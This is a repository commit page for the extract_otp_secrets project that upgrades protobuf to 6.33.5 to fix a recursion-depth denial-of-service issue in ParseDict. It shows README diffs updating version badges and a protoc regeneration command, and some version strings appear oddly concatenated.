Public/extract_otp_secrets
2
0
Fork 0
Code Issues Pull Requests Packages Projects Releases 1 Wiki Activity

upgrade protobuf to 6.33.5 (fix security problem)

Browse Source 
Cause: protobuf affected by a JSON recursion depth bypass:

A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.

Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.
This commit is contained in:
scito
2026-01-31 13:58:54 +01:00
committed by Roland Kurmann
parent a4fecc66ea
commit 74d95d2437
9 changed files with 436 additions and 416 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
README.md
View File

@@ -14,7 +14,7 @@
[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/badges/StandWithUkraine.svg)](https://stand-with-ukraine.pp.ua)
<!-- ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/protobuf)
[![GitHub Pipenv locked Python version](https://img.shields.io/github/pipenv/locked/python-version/scito/extract_otp_secrets)](https://github.com/scito/extract_otp_secrets/blob/master/Pipfile.lock)
![protobuf 33.4version](https://img.shields.io/badge/protobuf-6.33.433.1-informational)-->
![protobuf 33.5version](https://img.shields.io/badge/protobuf-6.33.533.1-informational)-->
<!-- [![Github all releases](https://img.shields.io/github/downloads/scito/extract_otp_secrets/total.svg)](https://GitHub.com/scito/extract_otp_secrets/releases/) -->
@@ -385,7 +385,7 @@ python extract_otp_secrets.py = < example_export.png</pre>
* Provides a debug mode (-d) for analyzing import problems
* Written in modern Python using type hints and following best practices
* All these features are backed by tests ran nightly
* All functionality in one Python script: src/extract_otp_secrets.py (except protobuf 33.4generated code in protobuf_generated_python)
* All functionality in one Python script: src/extract_otp_secrets.py (except protobuf 33.5generated code in protobuf_generated_python)
## KeePass
@@ -748,11 +748,11 @@ sudo dnf install python3-pip perl envsubst
The export QR code of "Google Authenticator" contains the URL `otpauth-migration://offline?data=…`.
The data parameter is a base64 encoded proto3 message (Google Protocol Buffers).
Command for regeneration of Python code from proto3 message definition file (only necessary in case of changes of the proto3 message definition or new protobuf 33.4versions):
Command for regeneration of Python code from proto3 message definition file (only necessary in case of changes of the proto3 message definition or new protobuf 33.5versions):
protoc 33.4--plugin=protoc-33.4gen-mypy=path/to/protoc-33.4gen-mypy --python_out=src/protobuf_generated_python --mypy_out=src/protobuf_generated_python src/google_auth.proto
protoc 33.5--plugin=protoc-33.5gen-mypy=path/to/protoc-33.5gen-mypy --python_out=src/protobuf_generated_python --mypy_out=src/protobuf_generated_python src/google_auth.proto
The generated protobuf 33.4Python code was generated by protoc 33.433.1 (https://github.com/protocolbuffers/protobuf/releases/tag/v33.433.1).
The generated protobuf 33.5Python code was generated by protoc 33.533.1 (https://github.com/protocolbuffers/protobuf/releases/tag/v33.533.1).
For Python type hint generation the [mypy-protobuf](https://github.com/nipunn1313/mypy-protobuf) package is used.